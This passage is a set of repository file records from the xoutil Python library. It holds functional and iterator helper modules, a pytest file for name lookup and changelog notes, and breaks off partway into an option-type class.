"alphanum_fraction": 0.5607489943504333, "avg_line_length": 29.55021858215332, "blob_id": "64fffa18754fc275ead0f0137a71b7603d1ebc34", "content_id": "50dad537ce44b3f625400a59fb812530c981ddf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6997, "license_type": "no_license", "max_line_length": 78, "num_lines": 229, "path": "/xotl/tools/future/functools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to the `functools` module from the Python's standard library.\n\nYou may use this module as drop-in replacement of `functools`.\n\n\"\"\"\nfrom functools import * # noqa\nfrom functools import _CacheInfo # noqa\n\n\n# TODO: Check relevance of the following function.\n# The real signature should be (*funcs, times)\ndef power(*args):\n \"\"\"Returns the \"power\" composition of several functions.\n\n Examples::\n\n >>> import operator\n >>> f = power(partial(operator.mul, 3), 3)\n >>> f(23) == 3*(3*(3*23))\n True\n\n >>> power(operator.neg)\n Traceback (most recent call last):\n ...\n TypeError: power() takes at least 2 arguments (1 given)\n\n \"\"\"\n from xotl.tools.params import check_count\n from xotl.tools.fp.tools import compose\n\n check_count(args, 2, caller=\"power\")\n *funcs, times = args\n if any(not callable(func) for func in funcs):\n raise TypeError(\"Arguments of `power`, but last, must be callables\")\n if not (isinstance(times, int) and times > 0):\n raise TypeError(\"Last argument of `power` must be a positive integer\")\n if len(funcs) > 1:\n base = (compose(funcs),)\n else:\n base = (funcs[0],)\n return compose(*(base * times))\n\n\ndef lwraps(*args, **kwargs):\n 
\"\"\"Lambda wrapper.\n\n Useful for decorate lambda functions with name and documentation.\n\n As positional arguments could be passed the function to be decorated and\n the name in any order. So the next two ``identity`` definitions are\n equivalents::\n\n >>> from xotl.tools.future.functools import lwraps as lw\n\n >>> identity = lw('identity', lambda arg: arg)\n\n >>> identity = lw(lambda arg: arg, 'identity')\n\n As keyword arguments could be passed some special values, and any number\n of literal values to be assigned:\n\n - **name**: The name of the function (``__name__``); only valid if not\n given as positional argument.\n\n - **doc**: The documentation (``__doc__`` field).\n\n - **wrapped**: An object to extract all values not yet assigned. These\n values are ('__module__', '__name__' and '__doc__') to be assigned, and\n '__dict__' to be updated.\n\n If the function to decorate is present in the positional arguments, this\n same argument function is directly returned after decorated; if not a\n decorator is returned similar to standard `wraps`:func:.\n\n For example::\n\n >>> from xotl.tools.future.functools import lwraps as lw\n\n >>> is_valid_age = lw('is-valid-human-age', lambda age: 0 < age <= 120,\n ... doc=('A predicate to evaluate if an age is '\n ... 'valid for a human being.')\n\n >>> @lw(wrapped=is_valid_age)\n ... def is_valid_working_age(age):\n ... return 18 < age <= 70\n\n >>> is_valid_age(16)\n True\n\n >>> is_valid_age(200)\n False\n\n >>> is_valid_working_age(16)\n False\n\n .. 
versionadded:: 1.7.0\n\n \"\"\"\n from types import FunctionType, MethodType\n from xotl.tools.symbols import Unset\n from xotl.tools.params import check_count\n\n def repeated(name):\n msg = \"lwraps got multiple values for argument '{}'\"\n raise TypeError(msg.format(name))\n\n def settle_str(name, value):\n if value is not Unset:\n if isinstance(value, str):\n if name not in source:\n source[name] = value\n else:\n repeated(name)\n else:\n msg = 'lwraps expecting string for \"{}\", {} found'\n raise TypeError(msg.format(name, type(value).__name__))\n\n methods = (staticmethod, classmethod, MethodType)\n decorables = methods + (FunctionType,)\n\n name_key = \"__name__\"\n doc_key = \"__doc__\"\n mod_key = \"__module__\"\n safes = {name_key, mod_key}\n source = {}\n target = Unset\n count = len(args)\n check_count(count, 0, 2, caller=\"lwraps\")\n i = 0\n while i < count:\n arg = args[i]\n if isinstance(arg, str):\n settle_str(name_key, arg)\n elif isinstance(arg, decorables):\n if target is Unset:\n target = arg\n else:\n repeated(\"target-function\")\n else:\n msg = \"lwraps arg {} must be a string or decorable function\"\n raise TypeError(msg.format(i))\n i += 1\n wrapped = kwargs.pop(\"wrapped\", Unset)\n settle_str(name_key, kwargs.pop(\"name\", Unset))\n settle_str(name_key, kwargs.pop(name_key, Unset))\n settle_str(doc_key, kwargs.pop(\"doc\", Unset))\n settle_str(doc_key, kwargs.pop(doc_key, Unset))\n source.update(kwargs)\n if wrapped is not Unset:\n # TODO: Check the type of `wrapped` to find these attributes in\n # disparate callable objects similarly with functions.\n for name in (mod_key, name_key, doc_key):\n if name not in source:\n source[str(name)] = getattr(wrapped, name)\n d = source.setdefault(\"__dict__\", {})\n d.update(wrapped.__dict__)\n\n def wrapper(target):\n if isinstance(target, decorables):\n res = target\n if isinstance(target, methods):\n target = target.__func__\n for name in (mod_key, name_key, doc_key):\n if name in source:\n 
value = source.pop(name)\n if name in safes:\n value = str(value)\n setattr(target, str(name), value)\n d = source.pop(\"__dict__\", Unset)\n if d:\n target.__dict__.update(d)\n for key in source:\n setattr(target, key, source[key])\n return res\n else:\n msg = \"only functions are decorated, not {}\"\n raise TypeError(msg.format(type(target).__name__))\n\n return wrapper(target) if target else wrapper\n\n # TODO: Next code could be removed.\n # func.__name__ = string.force(name)\n # if doc:\n # func.__doc__ = doc\n # return func\n\n\ndef curry(f):\n \"\"\"Return a function that automatically 'curries' is positional arguments.\n\n Example::\n\n >>> add = curry(lambda x, y: x + y)\n >>> add(1)(2)\n 3\n\n >>> add(1, 2)\n 3\n\n >>> add()()()(1, 2)\n 3\n \"\"\"\n from xotl.tools.future.inspect import getfullargspec\n\n fargs = getfullargspec(f)[0]\n\n def curried(cargs=None):\n if cargs is None:\n cargs = []\n\n def inner(*args, **kwargs):\n cargs_ = cargs + list(args)\n if len(cargs_) < len(fargs):\n return curried(cargs_)\n else:\n return f(*cargs_, **kwargs)\n\n return inner\n\n return curried()\n" }, { "alpha_fraction": 0.5519999861717224, "alphanum_fraction": 0.5635789632797241, "avg_line_length": 27.787878036499023, "blob_id": "7b58ad00e286756749a14619d0bbeb01f7683b60", "content_id": "016d3d47cdd9c8705f78aeb35ea42691152f3d6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14257, "license_type": "no_license", "max_line_length": 91, "num_lines": 495, "path": "/xotl/tools/future/itertools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Several util functions for iterators.\n\n.. 
versionchanged:: 1.8.4 Renamed to `xotl.tools.future.iterator`:mod:. The\n ``xotl.tools.iterators`` is now a deprecated alias.\n\n\"\"\"\nimport sys\nfrom itertools import * # noqa\nfrom xotl.tools.symbols import Unset\nfrom xotl.tools.deprecation import deprecated_alias, deprecated\n\nmap = deprecated_alias(map, removed_in_version=\"3.0\", check_version=True)\nzip = deprecated_alias(zip, removed_in_version=\"3.0\", check_version=True)\n\n\ndef first_non_null(iterable, default=None):\n \"\"\"Returns the first value from iterable which is non-null.\n\n This is roughly the same as::\n\n next((x for x in iter(iterable) if x), default)\n\n .. versionadded:: 1.4.0\n\n \"\"\"\n return next((x for x in iter(iterable) if x), default)\n\n\ndef flatten(sequence, is_scalar=None, depth=None):\n \"\"\"Flatten-out a sequence.\n\n It takes care of everything deemed a collection (i.e, not a scalar\n according to the callable passed in `is_scalar` argument; if ``None``,\n iterables -but strings- will be considered as scalars.\n\n For example::\n\n >>> range_ = lambda *a: list(range(*a))\n >>> tuple(flatten((1, range_(2, 5), range(5, 10))))\n (1, 2, 3, 4, 5, 6, 7, 8, 9)\n\n If `depth` is None the collection is flattened recursively until the\n \"bottom\" is reached. If `depth` is an integer then the collection is\n flattened up to that level. `depth=0` means not to flatten. Nested\n iterators are not \"exploded\" if under the stated `depth`::\n\n # In the following doctest we use ``...range(...X)`` because the\n # string repr of range differs in Py2 and Py3k.\n\n >>> tuple(flatten((range_(2), range(2, 4)), depth=0)) # doctest: +ELLIPSIS # noqa\n ([0, 1], ...range(2, 4))\n\n >>> tuple(flatten((range(2), range_(2, 4)), depth=0)) # doctest: +ELLIPSIS # noqa\n (...range(...2), [2, 3])\n\n .. 
note:: Compatibility issue\n\n In Python 2 ``bytes`` is the standard string but in Python 3 is a\n binary buffer, so ``flatten([b'abc', [1, 2, 3]])`` will deliver\n different results.\n\n \"\"\"\n if is_scalar is None:\n\n def is_scalar(maybe):\n \"\"\"Returns if `maybe` is not not an iterable or a string.\"\"\"\n from collections import Iterable\n\n return isinstance(maybe, str) or not isinstance(maybe, Iterable)\n\n for item in sequence:\n if is_scalar(item):\n yield item\n elif depth == 0:\n yield item\n else:\n if depth is not None:\n depth = depth - 1\n for subitem in flatten(item, is_scalar, depth=depth):\n yield subitem\n\n\ndef pop_first(source, keys, default=None):\n \"\"\"Pop first value from `source` from given `keys`.\n\n :param source: Any compatible mapping.\n\n :param keys: Reference keys to pop the value.\n\n Examples::\n\n >>> d = {'x': 1, 'y': 2, 'z': 3}\n >>> pop_first(d, ('a', 'y', 'x'), '---')\n 2\n\n >>> pop_first(d, ('a', 'y', 'x'), '---')\n 1\n\n >>> pop_first(d, ('a', 'y', 'x'), '---')\n '---'\n\n \"\"\"\n return next((source.pop(key) for key in keys if key in source), default)\n\n\ndef multi_pop(source, *keys):\n \"\"\"Pop values from `source` of all given `keys`.\n\n :param source: Any compatible mapping.\n\n :param keys: Keys to pop values.\n\n All keys that are not found are ignored.\n\n Examples::\n\n >>> d = {'x': 1, 'y': 2, 'z': 3}\n >>> next(multi_pop(d, 'a', 'y', 'x'), '---')\n 2\n\n >>> next(multi_pop(d, 'a', 'y', 'x'), '---')\n 1\n\n >>> next(multi_pop(d, 'a', 'y', 'x'), '---')\n '---'\n\n \"\"\"\n return (source.pop(key) for key in keys if key in source)\n\n\ndef multi_get(source, *keys):\n \"\"\"Get values from `source` of all given `keys`.\n\n :param source: Any compatible mapping.\n\n :param keys: Keys to get values.\n\n All keys that are not found are ignored.\n\n Examples::\n\n >>> d = {'x': 1, 'y': 2, 'z': 3}\n >>> next(multi_get(d, 'a', 'y', 'x'), '---')\n 2\n\n >>> next(multi_get(d, 'a', 'y', 'x'), '---')\n 2\n\n >>> 
next(multi_get(d, 'a', 'b'), '---')\n '---'\n\n \"\"\"\n return (source.get(key) for key in keys if key in source)\n\n\ndef dict_update_new(target, source, fail=False):\n \"\"\"Update values in `source` that are new (not present) in `target`.\n\n If `fail` is True and a value is already set, an error is raised.\n\n \"\"\"\n for key in source:\n if key not in target:\n target[key] = source[key]\n elif fail:\n raise TypeError('key \"{}\" already in target'.format(key))\n\n\ndef delete_duplicates(seq, key=lambda x: x):\n \"\"\"Remove all duplicate elements from `seq`.\n\n Two items ``x`` and ``y`` are considered equal (duplicates) if\n ``key(x) == key(y)``. By default `key` is the identity function.\n\n Works with any sequence that supports `len`:func:,\n `~object.__getitem__`:meth:, and `addition <object.__add__>`:meth:.\n\n .. note:: ``seq.__getitem__`` should work properly with slices.\n\n The return type will be the same as that of the original sequence.\n\n .. versionadded:: 1.5.5\n\n .. versionchanged:: 1.7.4 Added the `key` argument. Clarified the\n documentation: `seq` should also implement the ``__add__`` method and\n that its ``__getitem__`` method should deal with slices.\n\n \"\"\"\n i, done = 0, set()\n while i < len(seq):\n k = key(seq[i])\n if k not in done:\n done.add(k)\n i += 1\n else:\n seq = seq[:i] + seq[i + 1 :]\n return seq\n\n\ndef iter_delete_duplicates(iter, key=lambda x: x):\n \"\"\"Yields non-repeating (and consecutive) items from `iter`.\n\n `key` has the same meaning as in `delete_duplicates`:func:.\n\n Examples:\n\n >>> list(iter_delete_duplicates('AAAaBBBA'))\n ['A', 'a', 'B', 'A']\n\n >>> list(iter_delete_duplicates('AAAaBBBA', key=lambda x: x.lower()))\n ['A', 'B', 'A']\n\n .. 
versionadded:: 1.7.4\n\n \"\"\"\n last = object() # a value we're sure `iter` won't produce\n for x in iter:\n k = key(x)\n if k != last:\n yield x\n last = k\n\n\ndef iter_without_duplicates(it, key=lambda x: x):\n \"\"\"Yields non-repeating items from `iter`.\n\n `key` has the same meaning as in `delete_duplicates`:func:.\n\n The difference between this function and `iter_delete_duplicates`:func: is\n that we ensure the same item (as per `key`) is produced only once; while\n `iter_delete_duplicates`:func: only remove consecutive repeating items.\n\n Example:\n\n >>> list(iter_without_duplicates('AAAaBBBA', key=lambda x: x.lower()))\n ['A', 'B']\n\n\n \"\"\"\n done = set()\n for what in it:\n k = key(what)\n if k not in done:\n yield what\n done.add(k)\n\n\ndef slides(iterable, width=2, fill=None):\n \"\"\"Creates a sliding window of a given `width` over an iterable::\n\n >>> list(slides(range(1, 11)))\n [(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)]\n\n If the iterator does not yield a width-aligned number of items, the last\n slice returned is filled with `fill` (by default None)::\n\n >>> list(slides(range(1, 11), width=3)) # doctest: +ELLIPSIS\n [(1, 2, 3), (4, 5, 6), (7, 8, 9), (10, None, None)]\n\n .. versionchanged:: 1.4.0 If the `fill` argument is a collection is cycled\n over to get the filling, just like in `first_n`:func:.\n\n .. 
versionchanged:: 1.4.2 The `fill` argument now defaults to None,\n instead of Unset.\n\n \"\"\"\n from itertools import cycle, repeat\n from collections import Iterable\n\n pos = 0\n res = []\n iterator = iter(iterable)\n current = next(iterator, Unset)\n while current is not Unset:\n if pos < width:\n res.append(current)\n current = next(iterator, Unset)\n pos = pos + 1\n else:\n yield tuple(res)\n res = []\n pos = 0\n if res:\n if isinstance(fill, Iterable):\n fill = cycle(fill)\n else:\n fill = repeat(fill)\n while pos < width:\n res.append(next(fill))\n pos += 1\n yield tuple(res)\n\n\ndef continuously_slides(iterable, width=2, fill=None):\n \"\"\"Similar to `slides`:func: but moves one item at the time (i.e\n continuously).\n\n `fill` is only used to fill the fist chunk if the `iterable` has less\n items than the `width` of the window.\n\n Example (generate a texts tri-grams)::\n\n >>> slider = continuously_slides(str('maupassant'), 3)\n >>> list(str('').join(chunk) for chunk in slider)\n ['mau', 'aup', 'upa', 'pas', 'ass', 'ssa', 'san', 'ant']\n\n \"\"\"\n i = iter(iterable)\n res = []\n while len(res) < width:\n current = next(i, fill)\n res.append(current)\n yield tuple(res)\n current = next(i, Unset)\n while current is not Unset:\n res.pop(0)\n res.append(current)\n yield tuple(res)\n current = next(i, Unset)\n\n\n@deprecated(\n None,\n \"first_n is deprecated and it will be removed, use stdlib's itertools.islice\",\n)\ndef first_n(iterable, n=1, fill=Unset):\n \"\"\"Takes the first `n` items from iterable.\n\n If there are less than `n` items in the iterable and `fill` is\n `~xotl.tools.symbols.Unset`:class:, a StopIteration exception is raised;\n otherwise it's used as a filling pattern as explained below.\n\n .. 
deprecated:: 2.1.6 Use `itertools.islice`:func:, if you need `fill` you\n can also use `itertools.cycle`:func: or `itertools.repeat`:func:.\n\n :param iterable: An iterable from which the first `n` items should be\n collected.\n\n :param n: The number of items to collect\n :type n: int\n\n :param fill: The filling pattern to use. It may be:\n\n - a collection, in which case `first_n` fills the last items\n by cycling over `fill`.\n\n - anything else is used as the filling pattern by repeating.\n\n :returns: The first `n` items from `iterable`, probably with a filling\n pattern at the end.\n :rtype: generator object\n\n .. versionadded:: 1.2.0\n\n .. versionchanged:: 1.4.0 The notion of collection for the `fill` argument\n uses ``xotl.tools.types.is_collection`` instead of\n probing for the ``__iter__`` method.\n\n .. versionchanged:: 1.7.2 The notion of collection for the `fill` argument\n uses ``isinstance(fill, Iterable)`` replacing\n ``xotl.tools.types.is_collection``. We must be\n consistent with `iterable` argument that allow an\n string as a valid iterable and `is_collection` not.\n\n \"\"\"\n from itertools import islice\n\n if fill is not Unset:\n from collections import Iterable\n from itertools import cycle, repeat, chain\n\n if isinstance(fill, Iterable):\n fill = cycle(fill)\n else:\n fill = repeat(fill)\n seq = chain(iterable, fill)\n else:\n seq = iter(iterable)\n return islice(seq, n)\n\n\ndef ungroup(iterator):\n \"\"\"Reverses the operation of `itertools.groupby`:func: (or similar).\n\n The `iterator` should produce pairs of ``(_, xs)``; where ``xs`` is\n another iterator (or iterable).\n\n It's guaranteed that the `iterator` will be consumed at the *boundaries*\n of each pair, i.e. before taking another pair ``(_, ys)`` from `iterator`\n the first ``xs`` will be fully yielded.\n\n Demonstration:\n\n >>> def groups():\n ... def chunk(s):\n ... for x in range(s, s+3):\n ... print('Yielding x:', x)\n ... yield x\n ...\n ... for g in range(2):\n ... 
print('Yielding group', g)\n ... yield g, chunk(g)\n\n >>> list(ungroup(groups()))\n Yielding group 0\n Yielding x: 0\n Yielding x: 1\n Yielding x: 2\n Yielding group 1\n Yielding x: 1\n Yielding x: 2\n Yielding x: 3\n [0, 1, 2, 1, 2, 3]\n\n This is not the same as::\n\n >>> import itertools\n >>> xs = itertools.chain(*(xs for _, xs in groups()))\n Yielding group 0\n Yielding group 1\n\n Notice that the iterator was fully consumed just to create the arguments\n to ``chain()``.\n\n .. versionadded:: 1.7.3\n\n \"\"\"\n for _, xs in iterator:\n for x in xs:\n yield x\n\n\nif sys.version_info < (3, 5):\n\n class _safeitem:\n __slots__ = [\"item\", \"key\"]\n\n def __init__(self, item, key=None):\n self.item = item\n self.key = key or (lambda x: x)\n\n def __le__(self, other):\n return self.key(self.item) <= self.key(other.item)\n\n def __lt__(self, other):\n return self.key(self.item) < self.key(other.item)\n\n def __ge__(self, other):\n return self.key(self.item) >= self.key(other.item)\n\n def __gt__(self, other):\n return self.key(self.item) > self.key(other.item)\n\n def __eq__(self, other):\n return self.key(self.item) == self.key(other.item)\n\n def merge(*iterables, key=None):\n \"\"\"Merge the iterables in order.\n\n Return an iterator that yields all items from `iterables` following\n the order given by `key`. If `key` is not given we compare the items.\n\n If the `iterables` yield their items in order (w.r.t `key`), the\n result is also ordered (like a merge sort).\n\n ``merge()`` returns the *empty* iterator.\n\n .. versionadded:: 1.8.4\n\n .. versionchanged:: 2.1.0 Based on `heapq.merge`:func:. 
In Python\n 3.5+, this is just an alias of it.\n\n \"\"\"\n from heapq import merge # noqa\n\n if key is None:\n key = lambda x: x\n params = ((_safeitem(x, key) for x in iter_) for iter_ in iterables)\n for x in merge(*params):\n yield x.item\n\n\nelse:\n from heapq import merge # noqa\n\ndel sys\n" }, { "alpha_fraction": 0.6473551392555237, "alphanum_fraction": 0.6506296992301941, "avg_line_length": 32.64406967163086, "blob_id": "ba65f1438375376c1de765c2f6ba724b6c28e837", "content_id": "efde5a6d0dd49695fa7862c090481e01ec17e6c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3971, "license_type": "no_license", "max_line_length": 87, "num_lines": 118, "path": "/tests/test_names.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom xoutil.versions import python_version\nfrom xoutil.future.collections import OrderedSmartDict\n\nPYPY = python_version.pypy\n\n\ndef test_nameof():\n from xoutil.names import nameof, simple_name\n from collections import OrderedDict as sorted_dict\n\n assert nameof(sorted_dict) == \"sorted_dict\"\n assert nameof(sorted_dict, inner=True) == \"OrderedDict\"\n sd = sorted_dict(x=1, y=2)\n assert nameof(sd) == \"sd\"\n assert nameof(sd, typed=True) == \"sorted_dict\"\n assert nameof(sd, inner=True, typed=True) == \"OrderedDict\"\n s = \"foobar\"\n assert nameof(s, inner=True) == \"foobar\"\n # The following needs to be tested outside the assert, cause in Py3.3,\n # py.test rewrites the assert sentences and the local scope `nameof`\n # searched is not reached properly.\n passed = nameof(\"foobar\") == \"s\"\n assert passed\n\n i = 1\n assert nameof(i) == 
\"i\"\n assert nameof(i, inner=True) == \"1\"\n assert nameof(i, typed=True) == \"int\"\n assert hex(id(sd)) in nameof(sd, inner=True)\n values = (None, True, False, BaseException, int, dict, object)\n names = [simple_name(v) for v in values]\n names.sort()\n assert names == [\"BaseException\", \"False\", \"None\", \"True\", \"dict\", \"int\", \"object\"]\n\n\ndef test_nameof_methods():\n from xoutil.names import nameof, simple_name\n\n class Foobar:\n def __init__(self):\n self.attr = \"foobar\"\n\n def first(self):\n pass\n\n @staticmethod\n def second():\n pass\n\n @classmethod\n def third(cls):\n pass\n\n obj = Foobar()\n attrs = (getattr(obj, n) for n in dir(obj) if not n.startswith(\"_\"))\n attrs = (v for v in attrs if callable(v))\n names = nameof(*attrs)\n names.sort()\n assert names == [\"first\", \"second\", \"third\"]\n attrs = (getattr(obj, n) for n in dir(obj) if not n.startswith(\"_\"))\n attrs = (v for v in attrs if callable(v))\n names = [simple_name(v, join=False) for v in attrs]\n names.sort()\n assert names == [\"first\", \"second\", \"third\"]\n\n\[email protected](PYPY, reason=\"'OrderedDict' is in '_pypy_collections'\")\ndef test_fullnameof():\n from xoutil.names import nameof, simple_name\n\n _name = \"collections.OrderedDict\"\n from collections import OrderedDict as sorted_dict\n\n assert nameof(sorted_dict, full=True) == \"test_fullnameof.sorted_dict\"\n assert nameof(sorted_dict, inner=True, full=True) == _name\n sd = sorted_dict(x=1, y=2)\n assert nameof(sd, full=True) == \"test_fullnameof.sd\"\n assert nameof(sd, typed=True, full=True) == \"test_fullnameof.sorted_dict\"\n assert nameof(sd, inner=True, typed=True, full=True) == _name\n assert simple_name(simple_name) == \"xotl.tools.names.simple_name\"\n assert simple_name(sd) == \"collections.OrderedDict\"\n\n\[email protected](PYPY, reason=\"'OrderedDict' is in '_pypy_collections'\")\ndef test_fullnameof_no_rename():\n from xoutil.names import nameof\n from collections import 
OrderedDict\n\n _full_name = \"test_fullnameof_no_rename.OrderedDict\"\n _name = \"collections.OrderedDict\"\n assert nameof(OrderedDict, full=True) == _full_name\n assert nameof(OrderedDict, inner=True, full=True) == _name\n\n\ndef test_module_level_name():\n from xoutil.names import nameof\n\n assert nameof(OrderedSmartDict) == \"OrderedSmartDict\"\n assert nameof(OrderedSmartDict, typed=True) == \"OrderedSmartDict\"\n\n\ndef test_module_level_name_isolated():\n from xoutil.names import nameof, simple_name\n\n full_name_1 = \"test_names.OrderedSmartDict\"\n full_name_2 = \"xotl.tools.future.collections.OrderedSmartDict\"\n assert nameof(OrderedSmartDict, full=True) == full_name_1\n assert simple_name(OrderedSmartDict) == full_name_2\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.7155555486679077, "avg_line_length": 34.52631759643555, "blob_id": "743d785f86ac1484a3a42899c64adddcaaf40231", "content_id": "5554b5f181fe53ca6cf6ebaa3066ecae0ca3c688", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1350, "license_type": "permissive", "max_line_length": 79, "num_lines": 38, "path": "/docs/source/history/changes-1.4.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecations and introductions:\n\n - Importing `xoutil.Unset`:data: and `xoutil.Ignored`:data: from\n `xoutil.types`:mod: now issues a warning.\n\n - New style for declaring portable metaclasses in\n `xoutil.objects.metaclass`:func:, so\n `xoutil.decorator.compat.metaclass`:func: is now deprecated.\n\n - Adds the module `xoutil.pprint`:mod: and function\n `xoutil.pprint.ppformat`:func:.\n\n - Adds the first version of package `xoutil.cli`:mod:.\n\n - Adds the `filter` parameter to functions `xoutil.objects.xdir`:func: and\n `xoutil.objects.fdir`:func: and deprecates `attr_filter` and\n `value_filter`.\n\n - Adds functions 
`xoutil.objects.attrclass`:func:,\n `xoutil.objects.fulldir`:func:.\n\n - Adds function `xoutil.iterators.continuously_slides`:func:.\n\n - Adds package `xoutil.threading`:mod:.\n\n - Adds package ``xoutil.html`` module and begins the port of\n ``xoutil.html.parser`` from Python 3.3 to xoutil, so that a common\n implementation for both Python 2.7 and Python 3.3 is available.\n\n- Bug fixes:\n\n - Fixes some errors with `classical <!xoutil.aop.classical>`:mod: AOP weaving\n of functions in modules that where `customized\n <xoutil.modules.customize>`:func:.\n\n - Fixes bugs with `xoutil.modules`:mod:: makes\n `xoutil.modules.modulemethod`:func: to customize the module, and improves\n performance.\n" }, { "alpha_fraction": 0.7223719954490662, "alphanum_fraction": 0.7243935465812683, "avg_line_length": 33.511627197265625, "blob_id": "52707a90c6067226e2618aa9e13ee6a1331a89b3", "content_id": "0c5eee036e3d877bb0f7fdb5ccb5b1ed67346b76", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1484, "license_type": "permissive", "max_line_length": 78, "num_lines": 43, "path": "/docs/source/history/changes-1.4.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Refactors `xoutil.types`:mod: as explained in ``types-140-refactor``.\n\n- Changes involving `xoutil.collections`:mod:\\ :\n\n - Moves SmartDict and SortedSmartDict from `xoutil.data`:mod: to\n `xoutil.collections`:mod:. They are still accessible from\n `!xoutil.data`:mod:.\n\n - Also there is now a `xoutil.collections.SmartDictMixin`:class: that\n implements the `update` behind all smart dicts in xoutil.\n\n - `xoutil.collections.StackedDict`:class: in now a SmartDict and thus gains\n zero-level initialization data.\n\n- Removals of deprecated, poorly tested, or incomplete features:\n\n - Removes deprecated `!xoutil.decorators`:mod:. 
Use\n `xoutil.decorator`:mod:.\n\n - Removed `!xoutil.iterators.first`:func:, and\n `!xoutil.iterators.get_first`:func:.\n\n - Removed `!xoutil.string.names`:func:,\n `!xoutil.string.normalize_to_str`:func: and\n `!xoutil.string.normalize_str_collection`:func:.\n\n- Newly deprecated functions:\n\n - Deprecates `xoutil.iterators.obtain`:func:.\n\n - Deprecates `xoutil.iterators.smart_dict`:func: and\n `xoutil.data.smart_copy` in favor of `xoutil.objects.smart_copy`:func:.\n\n- New features:\n\n - Introduces `xoutil.iterators.first_non_null`:func:.\n\n - Adds `xoutil.objects.copy_class`:func: and updates\n `xoutil.decorator.compat.metaclass`:func: to use it.\n\n- Fixes a bug with `xoutil.deprecation.deprecated`:func: when used with\n classes: It changed the hierarchy and provoked infinite recursion in methods\n that use `super`.\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.739130437374115, "avg_line_length": 45, "blob_id": "b8a0bcc9288cbfe630c7e05e3d71ad6c4cedcfd9", "content_id": "2e47f77d618cd8fff5cc6a1ed407b00e9e9c4032", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 46, "license_type": "permissive", "max_line_length": 45, "num_lines": 1, "path": "/docs/source/history/_changes-1.9.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add module `xoutil.future.contextlib`:mod:.\n" }, { "alpha_fraction": 0.569949746131897, "alphanum_fraction": 0.5743862986564636, "avg_line_length": 30.746479034423828, "blob_id": "46c8a6987d76901e51d16a8222a25326c505db12", "content_id": "6ef13e60bacacbc3933f894525c7d30436e950f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6767, "license_type": "no_license", "max_line_length": 78, "num_lines": 213, "path": "/xotl/tools/fp/option.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": 
"UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Functional Programming *Option Type* definition.\n\nIn Programming, and Type Theory, an *option type*, or *maybe type*, represents\nencapsulation of an optional value; e.g., it is used in functions which may or\nmay not return a meaningful value when they are applied.\n\nIt consists of either a constructor encapsulating the original value ``x``\n(written ``Just x`` or ``Some x``) or an empty constructor (called *None* or\n*Nothing*). Outside of functional programming, these are known as *nullable\ntypes*.\n\nIn our case *option type* will be the `Maybe`:class: class (the equivalent of\n`Option` in *Scala Programming Language*), the wrapper for valid values will\nbe the `Just`:class: class (equivalent of `Some` in *Scala*); and the wrapper\nfor invalid values will be the `Wrong`:class: class.\n\nInstead of *None* or *Nothing*, `Wrong` is used because two reasons:\n(1) already existence of `None` special Python value, and (2) `Wrong`:class:\nalso wraps incorrect values and can have several instances (not only a *null*\nvalue).\n\n\"\"\"\n\n\nclass Maybe:\n \"\"\"Wrapper for optional values.\n\n The Maybe type encapsulates an optional value. A value of type\n ``Maybe a`` either contains a value of type ``a`` (represented as\n ``Just a``), or it is empty (represented as ``Nothing``). Using `Maybe``\n is a good way to deal with errors or exceptional cases without resorting\n to drastic measures such as error. 
In this implementation we make a\n variation where a ``Wrong`` object represents a missing (with special\n value ``Nothing``) or an improper value (including errors).\n\n See descendant classes `Just`:class: and `Wrong`:class: for more\n information.\n\n This implementation combines ``Maybe`` and ``Either`` Haskell data types.\n ``Maybe`` is a means of being explicit that you are not sure that a\n function will be successful when it is executed. Conventionally, the\n usage of ``Either`` for errors uses ``Right`` when the computation is\n successful, and ``Left`` for failing scenarios.\n\n In this implementation, `Just`:class` us used for equivalence with both\n Haskell ``Just`` and ``Right`` types; `Wrong`:class: is used with the\n special value ``Nothing`` and to encapsulate errors or incorrect values\n (Haskell ``Left``).\n\n Haskell::\n\n data Maybe a = Nothing | Just a\n\n either :: (a -> c) -> (b -> c) -> Either a b -> c\n\n Case analysis for the Either type. If the value is Left a, apply the\n first function to a; if it is Right b, apply the second function to b.\n\n \"\"\"\n\n __slots__ = \"inner\"\n _singletons = [None, None, None] # False, True, 